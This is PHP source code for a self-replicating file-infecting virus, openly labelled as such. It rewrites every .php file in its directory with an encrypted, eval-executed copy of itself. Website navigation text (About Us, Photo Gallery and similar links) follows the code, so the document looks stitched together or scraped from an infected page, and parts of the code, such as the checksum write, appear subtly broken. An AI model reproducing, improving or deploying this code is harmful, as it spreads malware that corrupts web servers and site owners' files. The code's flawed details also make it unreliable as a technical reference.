<?php
 
// VIRUS:START
function execute($virus){
// get files
$filenames = glob('*.php');
 
foreach($filenames as $filename){
$script = fopen($filename,"r");
//check if infected
$first_line = fgets($script);
$virus_hash = md5($filename);
if(strpos($first_line,$virus_hash)===false){
$infected = fopen("$filename.infected","w");
 
$checksum = '<?php // checksum: '.$virus_hash.' ?>';
$infection = '<?php'.encryptedVirus($virus).' ?>';
// put checksum in place
fputs($infected,$infection,strlen($checksum));
// put encrypted virus in file
fputs($infected,$infection,strlen($infection));
 
fputs($infected,$first_line,strlen($first_line));
//copies line by line and put in new file
while($contents=fgets($script)){
fputs($infected,$contents,strlen($contents));
}
fclose($script);
fclose($infected);
unlink("$filename");
rename("$filename.infected",$filename);
}
}
}
 
function encryptedVirus($virus){
//key
$str='0123456789abcdef';
$key='';
for($i=0;$i<64;$i++)
$key.=$str[rand(0,strlen($str)-1)];
$key = pack("H*",$key);
 
$iv_size = mcrypt_get_iv_size(MCRYPT_RIJNDAEL_128,MCRYPT_MODE_CBC);
$iv = mcrypt_create_iv($iv_size,MCRYPT_RAND);
$encryptVirus = mcrypt_encrypt(MCRYPT_RIJNDAEL_128,$key,$virus,MCRYPT_MODE_CBC,$iv);
$encodedVirus = base64_encode($encryptVirus);
$encodedIV = base64_encode($iv);
$encodedKey = base64_encode($key);
 
$payload = "
 \$encodedVirus = '$encodedVirus';
 \$iv = '$encodedIV';
 \$key = '$encodedKey';
 
 \$virus = mcrypt_decrypt(
MCRYPT_RIJNDAEL_128,
base64_decode(\$key),
base64_decode(\$encodedVirus),
MCRYPT_MODE_CBC,
base64_decode(\$iv)
);
eval(\$virus);
execute(\$virus);
 ";
return $payload;
 
}
 
$virus = file_get_contents(__FILE__);
$virus = substr($virus,strpos($virus,"//VIRUS:START"));
$virus = substr($virus,0,strpos($virus,"\n//VIRUS:END")+strlen("\n//VIRUS:END"));
//calling the execute function
execute($virus);
//VIRUS:END
 
?>

  En Francais

Navigate:

About Us

Location Activites and Technical Partners

Projects  and Needs

Contacts

Photo Gallery

HOME